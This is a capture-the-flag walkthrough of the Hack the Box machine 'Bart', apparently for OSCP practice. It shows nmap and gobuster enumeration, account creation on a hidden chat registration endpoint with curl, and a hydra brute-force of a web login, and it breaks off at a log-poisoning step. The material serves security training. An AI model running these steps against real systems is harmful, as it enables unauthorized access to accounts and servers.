Hack the Box - Bart

Machine IP: 10.10.10.81 - Windows
Difficulty: Medium
Category: OSCP Preparation

NMAP

▶ nmap -Pn -sS -p- 10.10.10.81 -T4 --min-rate 1000 -oN bart-ports.nmap

Nmap scan report for 10.10.10.81
Host is up (0.19s latency).
Not shown: 65534 filtered tcp ports (no-response)
PORT   STATE SERVICE
80/tcp open  http

▶ nmap -sC -sV -p 80 10.10.10.81 -oN bart-services.nmap

Nmap scan report for 10.10.10.81
Host is up (0.20s latency).

PORT   STATE SERVICE VERSION
80/tcp open  http    Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-title: Did not follow redirect to http://forum.bart.htb/
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 14.48 seconds

HTTP 80


Source


 - Harvey Potter
 - Developer@BART
 - h.potter@bart.htb

Content Discovery

  • Directory brute-force on http://10.10.10.81. The server answers every path with 200 OK, so the run only reports redirect and no-content codes (204, 301, 302, 307) and clears gobuster's default status-code blacklist.

▶ gobuster dir --url http://10.10.10.81 --wordlist /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt --status-codes 204,301,302,307 --status-codes-blacklist "" --threads 25


  • http://10.10.10.81/forum/
  • http://10.10.10.81/monitor/


User Credentials

  • Valid username: harvey.
  • Valid password: potter.
  • Logged in with harvey:potter.
  • Servers page.

Internal Domain

Internal host: internal-01.bart.htb

Content Discovery

▶ gobuster dir --url http://internal-01.bart.htb --wordlist /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt --status-codes 204,301,302,307 --status-codes-blacklist "" --threads 25


▶ gobuster dir --url http://internal-01.bart.htb/log --wordlist /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt --status-codes 204,301,302,307 --status-codes-blacklist "" --extensions php --threads 25


▶ gobuster dir --url http://internal-01.bart.htb/simple_chat --wordlist /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt --status-codes 204,301,302,307 --status-codes-blacklist "" --extensions php --threads 25


The source code for the chat server is on GitHub: https://github.com/magkopian/php-ajax-simple-chat. Comparing it with the running version, register_form.php and the link to it from login_form.php have been removed. Removing the form only hides registration from the browser: the register.php endpoint that processes the form is still reachable, so accounts can still be created by posting to it directly.

Create User Account

  • Using curl, create an account and get access to the site.

▶ curl -X POST http://internal-01.bart.htb/simple_chat/register.php -d "uname=hardyboy&passwd=password"


  • Logged in using the created username and password. (hardyboy:password)

Brute-Force Credentials (Optional)

  • Brute-force the password for user harvey (the form fields are uname and passwd; a failed login returns a page containing "Password").

▶ hydra -l harvey -P /usr/share/wordlists/metasploit/common_roots.txt internal-01.bart.htb http-form-post "/simple_chat/login.php:uname=^USER^&passwd=^PASS^&submit=Login:Password"

Log Poisoning

  • Vulnerable code (screenshot)